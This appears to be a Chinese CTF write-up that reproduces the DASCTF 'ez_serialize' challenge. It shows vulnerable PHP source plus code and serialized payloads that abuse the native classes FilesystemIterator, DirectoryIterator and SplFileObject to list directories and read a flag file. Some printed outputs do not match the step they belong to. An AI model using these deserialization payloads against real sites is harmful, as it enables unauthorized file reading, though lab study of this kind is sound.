ez_serialize复现

解题过程

题目给了源码

 <?php
error_reporting(0);
highlight_file(__FILE__);

class A{
     
    public $class;
    public $para;
    public $check;
    public function __construct()
    {
     
        $this->class = "B";
        $this->para = "ctfer";
        echo new  $this->class ($this->para);
    }
    public function __wakeup()
    {
     
        $this->check = new C;
        if($this->check->vaild($this->para) && $this->check->vaild($this->class)) {
     
            echo new  $this->class ($this->para);
        }
        else
            die('bad hacker~');
    }

}
class B{
     
    var $a;
    public function __construct($a)
    {
     
        $this->a = $a;
        echo ("hello ".$this->a);
    }
}
class C{
     

    function vaild($code){
     
        $pattern = '/[!|@|#|$|%|^|&|*|=|\'|"|:|;|?]/i';
        if (preg_match($pattern, $code)){
     
            return false;
        }
        else
            return true;
    }
}
if(isset($_GET['pop'])){
     
    unserialize($_GET['pop']);
}
else{
     
    $a=new A;

} 

分析一下：php反序列化，但是题目中并没有可利用的类，注意这个echo new $this->class ($this->para);，可以利用php原生类来进行操作

FilesystemIterator 遍历目录 直接echo会输出目录下第一个文件夹或文件名
SplFileObject 读取文件内容，按行读取，跨行需要遍历
DirectoryIterator 遍历目录 直接echo会输出目录下的

有了这个思路就清晰了，先利用FilesystemIterator读取一下目录/var/www/html

class A{
     
	public $class = 'FilesystemIterator';
	public $para = '/var/www/html';
	public $check;
}
$a =  new A();
echo serialize($a);

结果

O:1:"A":3:{
     s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

获得目录1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE

然后继续查看该目录文件

O:1:"A":3:{
     s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:13:"/var/www/html";s:5:"check";N;}

回显

接下来使用SplFileObject读取文件内容

class A{
     
	public $class = 'SplFileObject';
	public $para = '/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE/flag.php';
	public $check;
}
$a =  new A();
echo serialize($a);

回显，环境是自己复现的，flag瞎写的。

O:1:"A":3:{
     s:5:"class";s:18:"FilesystemIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

DirectoryIterator这个东西可以查看/var/www/html中的文件夹，但是再往后就不行了。

O:1:"A":3:{
     s:5:"class";s:17:"DirectoryIterator";s:4:"para";s:47:"/var/www/html/1aMaz1ng_y0u_c0Uld_f1nd_F1Ag_hErE";s:5:"check";N;}

参考链接

1. DASCTF-三月赛-web题复现